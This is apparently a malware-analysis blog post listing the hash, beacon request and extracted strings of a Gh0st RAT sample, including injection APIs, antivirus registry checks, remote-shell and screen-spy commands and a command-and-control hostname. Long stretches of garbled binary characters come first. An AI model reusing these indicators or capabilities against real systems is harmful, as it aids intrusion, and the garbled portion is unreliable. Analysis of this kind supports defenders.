ZSYhOXXh
heisj
j9j,j#XXj
jZXXkBk~k
XXk
kXXXlPlWlNlxl
luljl`XXlel
l8l5l,l
XXl
m9XXm?m*m'm
XXm
mWnyX`n%n
|Z[X8XXh0h
h\iH
i@i
iZzW[WHWHWHWHWHWHWH
_WHWHWHWHWHWHWHWHWHWHWHXXXXX
XY`XX
>=>>>:Z\
ZPEX[[~[]W\VH.?>>0!
7XX
jVWM
NLQYXXL_S
]_PPQJ
LKXXP
zqm
SQZ[
33\P4
ZH!vH
ZPxI
J^\H
JP\p
J_\pPXu]
\P^
ZPlW]V[4^'Y
W_>n{>>r?<>z
n_E
5?8]W<<\P4
.ZS[\
>>.ZZ>>ZCK
ZNL
[P>
]MN
[<[GZKZiZ[[k\l]JZ^][
?>j?
7]TW^]H<>
)]RW^WHTH[,;TJTU
%Z_J_ZJ
Z%[t
ZP_
Z@[[zL
L[RQ]>>
#[JZ
 ZP
Z__[Zp|_TWPWHWHWHWHWHWHWHWHWHWH
'WHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
?>"Z\0Z\
Z\HZ\`Z\rZ\
Z\*Z\
ZdlZ\ZZ\HZ\
]Z\
Z\:
?>*
Z\|Z\jZ\XZ\FZ\
Z\[
Z\[T
Z\PZ\@Z\[tB
Z\>z
Z\"Z\
Z\xZ\dZ\TZ\FZ\
Z\>
?>2Z\"
Z\|Z\dZ\JZ\
Z\PZ(
ZP,
]Z\xZ\dZ\XZ\DZ\
Z\"
Z\r
Z\^Z
rZ\\ZTPZ\@Z\
Z\>
?>,Z\
Z\&Z\4Z\
Z\pZ\`Z\LZ\
Z\JZ\VZ\hZ\tZ\
Z\ Z\2Z\
Z\K
Z\R
Z\<
J0ZP&Z\
Z\~Z\tZ\jZ\`Z\TZ\JZ\
BZ\
Z\*
zd[
ZH[
8>>
ZP[H
Z\[T
~4.Z
>[\ZETZ|
Z\fZ\tZ\
Z\HZ\"[
Z\ZG>
Z\.
Z\x
Z\LZ\
ZxvZP
Z\&
Z\:ZL
Z\H
Z\\Z\rZ\
Z\*Z\>Z\
Z\:jdlZ@&ZP
Z\lZ\(Z@
Z\pZ\fZ\^Z\8Z
JZPLZh\
Z\bZH
ZhKX
NP<J
Z\lZ\
ZP"Z\^Z\PZ\BZ\
2[dMJ
-Z\QZ\K
ZP4Z\5Z\J
ZPK
7ZP6Z\+Z\:
3ZP*K
ZP2Z\1Z\,Z\
Z\:
[8^J
`pZ\
Z\JZ\[L[\p
[RW\>>XX
JSN>>x>L>W>[>X8P>Z>R>G>p>_>SZH[jy
XZD_>\ZZ[ZR[J>>
/XP
}ZhN>J>
RKZz[>
L\i
ZRbZ\
fZ_>*
>kl\
[TWPZ[F+
IJjZPX
mQXJI_L[bsW]LQMZVXXbwPJ[LP[J
{FNRQL\X[L\JRRWxQLSMbmJQLXX_Y[
~_\]Z[XYVWTXXURSPQNOLMJKHIFGD8Xec`a^WGQGEBC@A>>m[X
z[\KYnLWHWR[Y[Z
mvwxj
}jZ
9Y\S>
r^NZ@iZ
QIM
U[G[
]rZL}R[_L
Z\cZ\C
mZ\BZ\eZ\EZ\^Z\@Z\
Z\Z
ZPaZ\
XXmJ_LJ
NNRW]_JWQ YP
[,[dWDZD
QD[R[]J
shT[ZW_^M^hs_WR^JZ
nR_G
n_KM[WtQNTJ[tL[HWQXyKM
jL_]UQ
p[FJWLhQ
RKS[
kN]
^HzQIP]JZ
yI^LsKJ[PL|LJ
_PZ`Y
vQZ
J?[
_xx_HQLWJr%[L
Q@mJ
]V[
[iPhz
Qtl
u[XL[M\uTtz
T@|Q
8WYVJ
{pk[{>
r[X_W}lz XqipZ
]UL
}lqrr
rq}
u[a
pks_U
\Lx
^PR
[_>
^P\
Z`\
[N_L_j8]
Z\j'>R
}QSNJ
R[[O
>NDczAXLpWCJpv{rl(z{rYY[
wpm{lj[S>
nlwpj
m}l{{J
{f{}kj{_
[E]DZ
m{r{}]h
vqs[u
{pz]l
n[Tm
>Zt{m}\|}
kmZ
rZt}r{
\lZ$j
|\l|L
>3:M34
VD>oo
>]PJ
\HJ
>{ZWJZg>w{
KJQI
R[J
mqxji
$[dH@h[LM
M9W[
U_HHX
[F[ZxRQ_Z
]LGNJ
ZRR
[LLQ<}}QM>qKX8JRQQU
avjj
[@PL[D
n_MMIQLZZ
\Hm[L
[klr[
UhkM[[)Q
W<PL[DS<\H]<P8[LZ'>[P
nqnkK>
]Y:
 Qd
X\/
,Un
L[}L[X|_J[wPMJ_P]L
RWXq\L_LG
NMj
[]E
>RN>
zXX
^pZFWpUpA
[PChms`Xjn
Nh\D^T
]]QKPJ
7S\
{S_WRZ%Z
[tZW>[PO
:5MM_YWPY
mK\MGMJ[SbnLQX*
MzX>W`XJb_`pjb}KLL[PJkg~
PBs[W
>>{4,U
PL^
t$\h{x^
|hR
[h[L[
[P\
WpM
ZZ:
[PS
s_P_Y
^HZ
>kln
@DN
` SL[$KLW,Z,qXXW][bZv[
bqsw
W&>>
xW[RZM>VJJNM
R\PZ_>
mJLz
>]_w
smp
mWYPX
KN>\
zN>
ZDanmjql{Y
FZMi
Z[z
ZIR[p[I\Oh
kPWP
ERk
>.5
fWYWHWHWHWH
WHWHWHWHWHWHWHWHWHWHZH?JV
\^ZHW[WHWHWHWHWHWHWHWHWHWHGFWHWHWHWH[H[M[J;G[TW\[H[UL'
T[TW\[HWx[LS\{m{jj
RJ*
SGWTWH>W
WiWH
]JWH
Q[:
JKN
lGj$k
MbE
Q6III
G_VQQNLQk
]QSQF>>Wx
iWx\
WNWC\
!\_R]
:ROWSWH
WHPHh
^KW_VH
[_\T[{Z
ImgmZ_J
C[K
W\WHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWHgXWHWHWHWHWHWH>mqxji
l{bXXsW]LQMQXJb
]JWH[XX
m[JKNbwPMJ_RR[ZXX
}QSNQP[PJMbE
|XX|
}}}
ZxC>p_S[[)MZ]b[FNRQ
XL[L
M]XZH
Mmgmj{sz
Z>Z>mN[]>Pw[F\
TXZ
_[Zf>>
mGMJ[SlQQHXJ
bM\T
bPJQMULPR^X
\n]{
wZR[
nLQ][MMX
>y[Jj]Nj_\ZLX_W[
IH\WJV
Z#>9
Z9[
kpupqX
ZImJ_J[
H_RK[
XXz{r{j{
j}|>>jws{x
wjZir
}uZS>
I}rqmwpy\P_yxwp\s
ZX>PT
>>{mj
|rwmv{zX`>mgp
l{}{whZUZ
[Hm{
Rp[
>Z{j{p[
}n9
DHM
]^Zk>{LLQL
Q]_X
JWPY
S[SQLG>
MJhMIv\
>kz_`
W`^`4[
ZMH\
WLoK[LGzlLHW][
8ztPXWY
ShZ
\xZT
\TQo>
9ZZZlmXH{lhw}{a|qqjaJ
lj9vT>_L}>_N>P@
kjq_N_tz{s
Tpz_NQtzwmJ
{z{E_tu{lp
{razlJ
lZA_@xwr{a^-_EYX_Diwp
aqipanlq}{
YmmR`]Dmvj
RFQ
wpj{l
}VTjZ7TxZ
>n_KM[z
\Pan[P
ZA}QPz_K[RK>lKPP]Fi
JQNSDz
LJRImZx[
Mz3Z
J6>>
ZR{Pk
KJ8XQZW_RZ
JbiWPZQIMxxb}KLL
ch[LMWQP
PLP[JziJZ
YM>_z`_N
ZRZ
>>bVI
JoK8
[LM
\WPZ
ZZP3|
{PJLXZG
Zr>>
Rp>9
>>9
K9z
K[=
u[G[
ZIPH[
{lZH
{FJJ#[ZkZ
8>RL
,>wXYNVRN_NW
>W@^?Z@
_Z7ZP[
]j]
[H]r
[H_xKJ
p]QL]
[L[
WH]
>>^X[K
ZOZ
>>]
ZZIQ>N>[>M
ZVFZ\ZCz
Z>RZZ[T
]>>lZQmZ\vZ\J
P]9
Z??Zs>ZNXu<ZH
Xs=]P
2y:K
]M0{
9x^Pp^P}^Pz]PZ^bO[Z
Z(][
>>BZIJ@MB
MW[[JZ@Z[FB
Z[M[lX[pQ>>g[M>G
kPUPQIL@>>n
Z;>hWMJ_ZQZL
[DfnPH
[Hpj
\lpj
\Ps
ZV>>vjjnXH
sQH
Yn[L\YS_
YRG34r<<QP
VJJNHx
KNZ_J[
]8XQS
jGN[
TFJ
VJSR\AP[
u[[HXN
$3434
|_ZXH
l[OK[MJ
wP*
ZG[
,QZIb
*[\M_X[
]V\T_pr
YZ4Zh]B
m{K{>_
\_WZN|K[
Zk>
X_:
WNXX
M[J
ZPM
ZVTC]NWpRp_ZZL
UtJZ
ZUXFMMJ
QRm[Jb^Sbp[JIQLU
XXz
}HX{
C>|
7>>
nwz
ZOM
[J]I
_bz<;]SK>
SI[d
sU\\
4\^
nRKYWPl 34
ZmJ
z{m}lw
znjwqpb
Mb}z
L_R
OQLhXb
>>PU
mJLWPY>
|KWRZ
nkJSZ?X^>
+DJ>F>J_XZA[
zWMNR_Gz
>>^@[
_Tw]QP>
lRR[
PW`[L
Q`>e
Mc[
xJa[
>>s]j%[>>
J_>
\Tj
mZn>
hy>
H_M[
[|[
[Tk
X]]mH]vj
^H\
H\jL_G^yM]V[Z^Tl_HsQ
YP]UmX}JR
]V>>kXm[
YPJQHp
]Vs]MVW[R_
xPM]MLH]
uhIM]]s>LT
WMz
]Uu
hMH^AsnP#
HN\y-HZ
\MZ
PQZ
RHLJHPPM]_]
L_HJ_MU\s_HYL
MF\S>lMQ
_MVm[LH\AZ<zTM_
UF[[(>UIM[P\xxLDm
HJ_J[
u\W>
[Ppqz
H[m[
qbw[}V[]U
lK_K]RJM]
k<&Z
JPU
w{f
-]W>
]S\
;`Z_>U0W
8jFI_L[
lgtntlKPbk
JV[
PJo
nZoM
WoWoWoJVM
bw{O
LLV
PEN;Q
g}r{lb
JS<
+5T@[
rK8+S*N
wWGZa
nX*
Z\Z[xbb
bmQKPZ
[Lh
ZMMX]aQM
QN[
\6Z
q\L
|L{V^
gmG
ZD[
ZC>Z#
bS[PK
>>J
.L>.
YN>.
1[MZ\
H>.
O>*2.ZS> Z]_@ZS>
^@-ZU9Z\JnR
QY]
{m{jZK>b@
[T\hWP
N_JW\R[
[@\K
XX[L
>WPMZJW]W*
S[SQLG>Z
__z
b[_S_V(
>>XWZ
^f_DPZ>
zQDXP_Z
[4_\^
j%.
'VB]
haZ
tP~~_hSxJ
>aWPXQZG
A>.X
>.FZ\@Z\
XXo7
XX#
TvO
UZD
qb?*
R8]]
XX36
`.Wr
LXXOY
UXX
~XX
gXX
(XX_
1XX
/rVf
H8O
XX.
&XX
3TA
?XXb]
oUU\_R"
pXX>\
8RE
iXX
BXX
[XXr
ar4
XXB3
O;n
..5
XXR
XX(
M,5]
TS3
XXdTD5
9Cz
8Wci\
XX8UPH%
XXt
lXX
uXX
r%4
^XXD:
GXX
=y5
:XXT
#XX
TK4XX
Y9L-XXi>;
XX%
VPXX
QIXXy
NT1
8XbXX5?/
U_{XX
R(F
syWw
XXIP
XXY
<%Vc
>ZY
RZ{
XXq6
XX_k
XX;g
ccI
"RR
0dXX
UQW
NXXH
795S
"XX,
OjN
[UXX
9XX
TC%
XXf;qG
z@\
"jXX
XX-7>
XXIjc
\L#
qXXgf,0('
XXp
7XX
VI[XX
J%7#
,XX:
vlN
@XX^
XX.qc
a0R
XXJ},d
IXX
%XX
RXXd q
+a@
">XX
Q%c
xXX
A]j
XXs
 MI
XX9
xDI
cXX]p
=9R
00XX
qY=
\XXr!
+XX
%>j
mGXX
wh@
XX\-
XX8
[yP
mXXK
XX/
|DI
XXe
vXX
(q;
XXo-0
k2ZXX
$7m
yb5NXX
# I
#^
XX5
rM.*XXd
XXxs
[n<
fXX)`
rXXs\
XX"O
g M
L"XX
qoHL
)J{
KFXX
uA(63C
XXJ
 |F
z@S
PRXX
IT<l
W6XXA
+S]X
+wp!muGK
XX]
7"p
p~{
zzXX
Mf1~
w|#
}nXXV
jY<
Ki7
*Bn
bd{Q`S
XX%
bXX
;3D
XXt
XX.$
vXX
/ix
^XXcF
XX2U
:XX
.XX
w~&
XXhi
J9zXX
-;I
9au
HkK
\1w
av+
>ZY[XXY
XXq6CZ
h.]f
i'n
Y}6LK
+XX&/
$|XX
yD6
eXX
2XXa
XXIfl3
dqi
QwA
XX6
BXX
fXX
H*1XX
XX)"
@W0
EUvI
XXV
:_r
@nX
XX~;
2"$
AXX
XXX
j^z
XX9
xY)
j<N
XXn
(XX
XXFk
`XX
@ny
\7XXx
XXP
w)tp
XX/
T"`
GXX
;'Us^XX@
x>V
XXh]
m76+
pL#
x/'
.XX?D^
iyXX
`/{8
sH]XX
ZoG
XX
{5\0
'9Wr
,Oc
XXw
-XX
RzXX_
cXX
#g4XX
XX0I
Po"
XXO
Ew3
XXgP
Yo!
DXP
>I9
'NT
BXX
.ZT
hZU
*?bq]8RXX
rW.XX`
YOL
XXy
XXR
bXXK
>XX
XX6
fVrXX/
OXX8
XX!
&AT3
]b?UUo
"R_XX\
\>pR8
XXE
XXn
XXw
r[s
oXX
=#XX
4ra
n;O
5..
3XX
IXX
]5,
3ST
DTd
VW8
\ic
[YXX
OPU8
DdY
XX@
iXXY
4%XXr
:D^
XXk
XX$
5yXX=
5XX
L9Y
;>i-
DXX*E
XX3B
XX|V
XXeQ
1TXXNX8
/?5b
XXW_U
^(XX
wWys
dXX
8XX
_tXX
cV%<
X'%
XX\
:CI
{hdXX
,om
XXN
Icc
RR"
XXx
[cc
QUXX
59XX7
NXXjO
"XX
XX%Cf
Gq;
\@z
qXX
>7{
XX\
bUG
#~jXX
(0,f1+
XXN
XX7
,XX
@XXx
[IV
#7XX%J:,
G[XX
N^@
XXjF
cqx
R0S
d,}
RXXN
>XX
$Vd
e}IXX
q 2
%XX
XX\
]XXs
YXX
XX9
IMvN
XX]c
cx$
|@j
=kG
XXr\
j>%
q)n
@hE
XX\
XX8
PXXKm
jTXX/
%XXX
\XX
XXe
P<x
XXg97
;q(XX
0-o
45byXX
I  ^#XX
.MrXX
d**
D)D
XXs
<nXX[
`)f
XX?
/?XX
eXX
\sr
XX+
4XXO
M g
"Hoq
XX{@
FAu
qC36(B
\XX
F|
S@z
RTI
l<W
A6]S+
XXo[
WXX
)um!pt
KXXGq
p"7
{~p
z~1fM|w
XX#j
Vnk
<YiK
XX7m
nB*
@XX
=`Q{da
XXS
D3XX;
XX_
WbXX
k8XX
XXK
xiXX/
Fc^
uXX
$XXc
&~XXw
5/XX
z9J
XX'
GXX
I;-
XXC
ua9
XXW
LXX3
PXX
KkH
w1\
[XXk
+va
\XX
C6q
f].hn'XXi
EXX
KL6}
XXAN
/&+
6Dy
nXX
qdI
XX.
lfI
iqAwXXQ
XXy'<
*XXf
*HXX
XXN
gr+
IvU
3XX1
rzQXX
Xn@h
zXX^j2
N<O
XXv
V)G
cXX
XX!
gXX
`yn@
XX7
~XX
XXH
XX`"q
sUXX';
7XX
V>x
+67m#LXXp
.XX
'/x
XXXK^D?.L
{/`
HsXX
XXGo
rW9
XXo
jXX
cO,
Heb
XX8
AXX
cBH
g#XX
XXW
b?@
"oP
XXX(
w7:XX
3wE%
!J2
XXZ[XR_J[
}QXXNGLWYVJ
t[_P
RQKN
y_WR@
[`_\
>.:>:>6Z\Y:t
[T;>.ZV]T8>
ZZ]T:Z@.>
>.6ZR[@_T
ZR>?
R[@[R<?>:]T<?ZT.[T
Z%@
8?.>>
Z\~Z\[G>WYSH?ZUS\<ZH5
S\=ZHS\:ZHS\;ZHS\ZWW[>_8_
8Zb[\9ZP[\6ZP[\7ZP[\4ZP5
[\5ZP[\2ZP[\3ZP[\Z_W[WHWHTH[
[X[
[$./,>69784;5:2=X
3<0?1>2>6>
Z\rZ\
Z\RZ\
Z\"Z\
Z\bZ\
Z\BZ\
Z\<Z\
Z\|Z\
Z\\Z\
Z\,Z\
Z\lZ\
Z\LZ\
Z\4Z\
Z\tZ\
Z\TZ\
Z\$Z\
Z\dZ\
Z\DZ\
Z\8Z\
Z\xZ\
Z\XZ\
Z\(Z\
Z\hZ\
Z\HZ\
Z\0Z\
Z\pZ\
Z\PZ\
Z\ Z\
Z\`Z\
Z\@Z\
Z\?Z\
Z\_Z\
Z\/Z\
Z\oZ\
Z\OZ\
Z\7Z\
Z\wZ\
Z\WZ\
Z\'Z\
Z\gZ\
Z\GZ\
Z\;Z\
Z\{Z\
Z\[Z\
Z\+Z\
Z\kZ\
Z\KZ\
Z\3Z\
Z\sZ\
Z\SZ\
Z\#Z\
Z\cZ\
Z\CZ\
Z\->7>-?7>
ZPmZPmZP
ZPMZPMZP
ZP5ZP5ZP
ZPuZPuZP
ZPUZPUZP
ZP%ZP%ZP
ZPeZPeZP
ZPEZPEZP
ZP9ZP9ZP
ZPyZPyZP
ZPYZPYZP
ZP)ZP)ZP
ZPiZPiZP
ZPIZPIZP
ZP1ZP1ZP
ZPqZPqZP
ZPQZPQZP
ZP!ZP!ZP
ZPaZPaZP
ZPAZPAZP
ZP>>9>
~Z\
Z\^Z\.Z\nZ\
Z\NZ\6Z\
vZ\
Z\VZ\&Z\fZ\
Z\FZ\:Z\
zZ\
Z\ZZ\*Z\jZ\
Z\JZ\=z|
Z\}Z\
Z\]Z\
Z\>>
;>&ZT:Z\*Z\2Z\"Z\<Z\
,Z\4Z\$Z\8Z\(Z\0Z\ Z\?Z\
/Z\7Z\'Z\;Z\+Z\3Z\#Z\=Z\
Z-Z\5Z\%Z\9Z\)Z\>?<=::
;;8ZY9ZY6^Y7^Y4VY5VY2WY
eVH3WYVH0WYWHWHVH1WYWHWHVH>>
:V,--*ZY+ZY(^Y)^Y&VY'VY
$WYVH%WYVH"WYWHWHVH#WYWHWHVHY
|X;8966774455K
K?Ks
.^Y/^Y,^Y-^YJoT[J
T[N
P_N
WW&F7WW'F7WW$F7WW"
<ZQ
=Z\:Z\
8ZP9Z\
4ZP
0ZP.-mZ\*Z\&Z\[e
ZP^Z\NZ\
Z\_[W,[(
[4[0[<[8[
>Ze
Z\>S
Zq>.fZ\
?.rZP
Z\"Z\2Z\
p>.[D?*[
>:X>\4>>x_
o5[
Z}_x
4XP
Zh/
5>^6=
t+G;m
|XyR
VH.
HP5
?cQ(.c
^QH
Xql
CVxHWZM>>.>J
B>.
ZPh
J8>^Y
ZY^S>NZ|_T[P
?Z]
VL[d
Zh[[
^x[T[\[
VL[d
^Lk
c.h
K6XXiT?
{21
Z_XY
XXu
}?1
XvK
+>>1
eZp\
o?=
ZP<^P=^P:^P;
^P8^P9^P6^P7^P4^P5^P2^P3M
^P0^P1[P=
.v1
8s2
wZ{
JV1\
a`ec
mkhXX
/>.m
mmm
|X8
ZS------------------------snip
xYHz
82:
1XY
Y(s^
>>>
YXZ_,
zz4
Lz<
&YXz0Y
K\Y
rYPj
XPf
?>"Z_
?>Fzp
Pjbs
8XZ,
zFPR
XX,
XZr
XX9
zRc:
J >
Z*>
Xrb
B*(
.bz$
~2:fR
XPv
vbRB
0j@p
W[WHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
WHWHWHWHWHWHWHWHWHWHWHWHWHWHWHWH
GWHWHWHWHWHWHWHWHWHWHWHWHWH>
mCZ
I7TS
.K7
w_i
+Rx
[ba^
WriteProcessMemory
VirtualAllocEx
kernel32.dll
VirtualAlloc
GetProcAddress
GetModuleHandleA
VirtualProtect
LoadLibraryA
VirtualFree
SOFTWARE\KasperskyLab\AVP6\environment
ProductRoot
SOFTWARE\KasperskyLab\protected\AVP9\settings
Ins_ProductPath
\UIFramework\uiWinMgr.exe
SOFTWARE\TrendMicro\Vizor
ProductPath
Kernel32.dll
\avp.exe
\klwtblfs.exe
SOFTWARE\KasperskyLab\protected\AVP12\environment
\wmifw.exe
ReadProcessMemory
CreateThread
Sleep
GetThreadContext
CreateProcessA
%SystemRoot%\System32\svchost.exe
Shlwapi.dll
SHGetValueA
VirtualProtectEx
%temp%\tmp092.tmp
Software\rar
data
\fxsst.dll
%SystemRoot%
IDI_ICON5
wwwwwx
D@w
wwwwx
xwp
DDD
wwwwwwwx
wwwwww

Search

Gh0st hgif strings - APT

September 3, 2013, 4:58 pm
$
0
0
File: DW20.exe
MD5:  5d2a996e66369c93f9e0bdade6ac5299
Size: 102400

GET /h.gif?pid =113&v=130586214568 HTTP/1.1
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive





Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Richi}
.text
`.rdata
@.data
h@A@
Rh P@
hPA@
h,P@
tUhT
h9P@
Ph\A@
hlA@
PPhR
h9P@
%(@@
%,@@
%0@@
% A@
hSVW
>"u:F
XPVSS
;x4u
ole32.dll
CoUninitialize
CoCreateInstance
CoInitialize
CloseHandle
VirtualFreeEx
WaitForSingleObject
LoadLibraryA
GetProcAddress
GetModuleHandleA
WriteProcessMemory
VirtualAllocEx
OpenProcess
CreateRemoteThread
Module32Next
Module32First
CreateToolhelp32Snapshot
GetLastError
WriteFile
SetFilePointer
GetFileSize
CreateFileA
GetModuleFileNameA
GetLongPathNameA
GetTempPathA
Sleep
FreeLibrary
lstrcatA
FindClose
FindNextFileA
FindFirstFileA
GetWindowsDirectoryA
GetShortPathNameA
MultiByteToWideChar
GetSystemInfo
KERNEL32.dll
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHELL32.dll
strlen
xcept_handler3
strcmp
sprintf
memset
strncpy
_stricmp
MSVCRT.dll
__dllonexit
_onexit
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z
??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
MSVCP60.dll
GetStartupInfoA
LocalAlloc
InterlockedExchange
RaiseException
Kernel32
FreeLibrary
!This program cannot be run in DOS mode.
Rich
.text
-----------------snip
_^[]
;x4u
QRhp=
QRhl=
@HTTP/1.0 200 OK
Content-type:text/html
Content-length:0
USER32.dll
ADVAPI32.dll
SHELL32.dll
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
 inflate 1.1.4 Copyright 1995-2002 Mark Adler
WS2_32.dll
WININET.dll
PSAPI.DLL
WTSAPI32.dll
wsprintfA
CharNextA
ExitWindowsEx
GetWindowThreadProcessId
IsWindowVisible
GetWindowTextA
EnumWindows
CloseDesktop
SetThreadDesktop
OpenInputDesktop
GetUserObjectInformationA
GetThreadDesktop
OpenDesktopA
PostMessageA
IsValidSid
LookupAccountNameA
LsaClose
LsaRetrievePrivateData
LsaOpenPolicy
LsaFreeMemory
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
LookupAccountSidA
GetTokenInformation
SHGetSpecialFolderPathA
SHGetFileInfoA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
ShellExecuteA
WSAIoctl
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
GetModuleFileNameExA
EnumProcessModules
WTSFreeMemory
WTSQuerySessionInformationA
InitializeCriticalSection
DeleteCriticalSection
VirtualFree
LeaveCriticalSection
EnterCriticalSection
Sleep
VirtualAlloc
CreateEventA
CloseHandle
WaitForSingleObject
ResetEvent
SetEvent
InterlockedExchange
CancelIo
lstrlenA
FreeLibrary
GetProcAddress
LoadLibraryA
GetVersionExA
GetTickCount
WriteFile
SetFilePointer
GetLastError
CreateProcessA
FindClose
LocalFree
LocalReAlloc
LocalAlloc
RemoveDirectoryA
OpenProcess
GetShortPathNameA
DeleteFileA
GetTempPathA
GetCurrentProcess
OutputDebugStringA
GetSystemDirectoryA
DisconnectNamedPipe
ReadFile
PeekNamedPipe
WaitForMultipleObjects
GetSystemDefaultUILanguage
ReleaseMutex
SetErrorMode
CreateThread
GetLocalTime
GetCurrentThreadId
KERNEL32.dll
??3@YAXPAX@Z
memmove
ceil
_ftol
__CxxFrameHandler
??2@YAPAXI@Z
_CxxThrowException
sprintf
free
_except_handler3
strtok
_beginthreadex
calloc
MSVCRT.dll
??1type_info@@UAE@XZ
_initterm
malloc
_adjust_fdiv
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
?_Xran@std@@YAXXZ
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
?_Xlen@std@@YAXXZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z
MSVCP60.dll
RaiseException
Serverz.dll
Connection: Keep-Alive
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)
Pragma: no-cache
Accept-Language: en-us
Accept: */*
GET /h.gif?pid =113&v=130586214568 HTTP/1.1
.PAX
.PAD
bad Allocate
bad buffer
%s\*.*
%s\%s
%s%s%s
%s%s*.*
KBDMGR.EXE
%skbdmgr.lnk
%skbdmgr.exe
C_RUN_PLUG_COMMAND_FILELIST_DRIVE
C_RUN_PLUG_COMMAND_SCREEN_SPY
C_RUN_PLUG_COMMAND_SHELL
C_ONLINE_ACTIVE
LCommend::RemoveServer
LCommend::Messgae
LCommend::LogoOff
LCommend::PowerReset
LCommend::PowerOff()
LCommend::Update
LCommend::OpenIE
SeShutdownPrivilege
open
iexplore.exe
 Update
wininet.dll
urlmon.dll
\cmd.exe
7.25 host
godson355.vicp.cc
%s:%d|%s %s|%s|%s|%s
%ug %um
%u GB
%u MB
GlobalMemoryStatusEx
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
%s SP%d
2008
Vista
2003
2000
memcpy
malloc
strchr
msvcrt.dll
SetUnhandledExceptionFilter
GetLocalTime
LeaveCriticalSection
lstrcmpiA
lstrlenA
lstrcmpA
lstrcpyA
lstrcatA
GetTempPathA
CreateFileA
FindFirstFileA
FindNextFileA
MoveFileA
DeleteFileA
GetLogicalDriveStringsA
GetFileAttributesA
GetDriveTypeA
GetWindowsDirectoryA
CreateDirectoryA
GetModuleFileNameA
GetVolumeInformationA
OpenEventA
CreatePipe
GetFileSize
